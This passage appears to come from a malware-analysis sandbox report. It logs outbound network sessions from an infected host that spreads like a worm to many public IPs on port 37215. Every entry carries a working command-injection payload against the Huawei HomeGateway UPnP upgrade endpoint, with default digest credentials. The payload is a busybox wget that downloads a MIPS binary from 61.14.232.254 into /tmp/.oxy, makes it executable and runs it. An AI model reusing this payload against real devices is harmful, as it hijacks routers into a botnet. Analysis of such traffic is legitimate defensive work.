2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1220192.168.2.13518104.13.217.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.524568081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1221192.168.2.1346092157.104.16.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.524707079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1222192.168.2.1359560197.100.113.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.525259972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1223192.168.2.135611441.181.2.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.525343895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1224192.168.2.135300441.92.9.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.525362968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1225192.168.2.1341454157.167.164.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.525567055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1226192.168.2.1341418157.105.38.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.525623083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1227192.168.2.1343336157.175.217.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526052952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1228192.168.2.135223689.170.28.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526078939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1229192.168.2.135109241.243.97.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526166916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1230192.168.2.1346728197.80.29.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.526196957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
